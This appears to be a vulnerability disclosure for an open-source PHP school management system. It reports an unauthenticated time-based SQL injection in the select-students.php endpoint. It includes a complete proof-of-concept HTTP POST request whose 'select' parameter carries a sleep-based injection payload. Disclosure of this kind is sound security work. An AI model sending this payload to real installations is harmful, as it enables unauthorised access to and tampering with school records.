yingyi Lin,shudong Li,zihao Lin,GZHU;
PHP School management system developed for schools or small institutes.
Github address:https://github.com/ProjectsAndPrograms/school-management-system
owner_panel/fetch-data/select-students.php Being in the front end delay SQL injection vulnerability This vulnerability allows attackers to manipulate the application's database through specially crafted SQL query strings. Due to insufficient verification of user input, attackers can insert malicious SQL code into input fields, thereby bypassing authentication, accessing or modifying sensitive data in the database, and even performing database management operations
In the owner_panel/fetch-data/select-student.php file
There is no defense against class input, and there is no need to log in to obtain a session to directly perform SQL injection attacks without a session
POST /owner_panel/fetch-data/select-students.php HTTP/1.1
Host: www.cvehhh.eek
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8,en-GB;q=0.7,en-US;q=0.6
Accept: */*
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/140.0.0.0 Safari/537.36 Edg/140.0.0.0
Content-Type: application/x-www-form-urlencoded
Origin: <http://www.cvehhh.eek>
Accept-Encoding: gzip, deflate
Referer: <http://www.cvehhh.eek/owner_panel/notices.php>
Content-Length: 37
select=1' or sleep(1);#
